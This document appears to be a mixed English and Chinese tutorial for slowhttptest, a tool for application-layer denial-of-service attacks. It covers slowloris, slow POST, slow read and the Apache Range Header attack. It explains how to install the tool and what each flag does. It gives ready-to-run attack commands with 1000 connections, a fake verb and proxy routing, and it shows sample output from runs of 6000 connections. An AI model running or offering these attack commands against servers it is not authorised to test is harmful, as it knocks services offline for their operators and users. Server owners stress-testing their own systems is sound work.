slowhttptest Application Layer DoS attacks tool support below slowloris, Slow HTTP POST, Slow Read attack (concurrent connections consumption) Apache Range Header attack ( memory and CPU consumption, CVE-2011-3192) refer https://code.google.com/p/slowhttptest/ Slow Read DoS attack explained http://www.xlgps.com/article/53972.html ....................................... Download https://code.google.com/p/slowhttptest/downloads/list
Installation $ tar -xzvf slowhttptest-x.x.tar.gz $ cd slowhttptest-x.x $ ./configure --prefix=< PREFIX> $ make $ sudo make install test your tool $< PREFIX>/bin/slowhttptest ........................................................................................ 基本攻擊 1.choose attack type -B : enables slow POST test -H : enables slow head test -X : enables slow read test -R : enables range test 2.choose target -u < URL> :target URL, format is http[s]://< host [:port] > ex:-u https://myseceureserverl 3.choose basic paramater -c < number> :number of connections , limited to 65539, default 50 -r < number> :connections per second connection rate, default 50 ps:有些linux本身會限制4000個連線,若工具超過此數值一樣僅使用4000連線,若非將linux限制解除 refer https://github.com/shekyan/slowhttptest/wiki/InstallationAndUsage ................................................. optinoal. paramater for information
-p < sec> :seconds timeout to wait for HTTP response on probe connection, after which server is considered inaccessible, default 5 -g : generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html, where xxx is the time and date -o < string> ex: -o my_body_stats -v < level> level1: default, every 5 seconds showing status of connections level4 : full traffic dump ...
other paramater -l < sec>: test duration in seconds, default 240 -t < custom string>: verb custom verb to use ex: -t FAKEVERB 代理伺服器 -d < proxy host>: for directing all traffic through web proxy -e < proxy host>: for directing only probe traffic through web proxy .......................................................................................... 指定進階攻擊 post or header attack
-i < sec> :interval between follow up data per connection, default 10 每隔幾秒送一次資料 ex: -i 100 Interval between follow up data 100 seconds 指定body一次送出的資料量 ? -x < byte> : max length of follow up data ex: -x 1 or -x 2 Test parameters: follow up data max size: 8 -x 3 Test parameters: follow up data max size: 10 -x 24 Test parameters: follow up data max size: 52 ps: head產生的最後值是輸入值*2+4 post產生的最後值是輸入值*2+2 ps: 最後實際與目標協商後的值還會變,此值僅供參考 指定post body長度, -s < byte> : Content-Length header value, default 4096 , if -B specified ps: header不適用, 因為預設會一直傳( 也就是不傳送結束字元/r/n) message body mode (post) ex: slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserverl -x 10 -p 3 slowloris mode (header) ex: slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver -x 24 -p 3 .........
read attack
指定windows size隨機範圍 -w < byte> :bytes start of range the advertised window size would be picked from -y < byte> : bytes end of range the advertised window size would be picked from ex: -w 10 -y 20 would make below receive window range: 10 - 20 ps: 此值和目標協商後,最後的值會不同 -n < sec> :seconds interval between read operations from receive buffer, default=1 -z < bytes> :to read from receive buffer with single read() operation, default=5 ex: -z 32 -n 5 would make below read rate from receive buffer: 32 bytes / 5 sec -k < number> :pipeline factor number of times to repeat the request in the same connection for slow read test if server supports HTTP pipe-lining. server要先支援此功能 ex: -k 10 Test parameters: Pipeline factor 10 ps: Pipelined Connections : 在一個connection 中同步發送 HTTP requests HTTP 1.1 允許在 persistent connections使用 Pipelining,在 response 回來前,就先發送多個request,在 high-latency 的網路環境中可以大大改善效能。 refer( https://ihower.tw/blog/archives/1517 ) slow read ex: slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350
slow read mode with probing through proxy ex: slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350 -e x.x.x.x:8080 ............................................................................... 攻擊畫面如下: Test parameters Test type SLOW BODY Number of connections 6000 Verb POST Content-Length header value 4096 Extra data max length14 Interval between follow up data 30 seconds Connections per seconds 200 Timeout for probe connection 3 Target test duration240 seconds Using proxy no proxy Test parameters Test type SLOW HEADERS Number of connections 6000 Verb GET Content-Length header value 4096 Extra data max length 52 Interval between follow up data 10 seconds Connections per seconds 200 Timeout for probe connection 3 Target test duration 240 seconds Using proxy no proxy Test parameters Test type SLOW READ Number of connections 6000 Receive window range 5 - 15 Pipeline factor 1 Read rate from receive buffer 10 bytes / 3 sec Connections per seconds 200 Timeout for probe connection 10 Target test duration 240 seconds Using proxy no proxy
|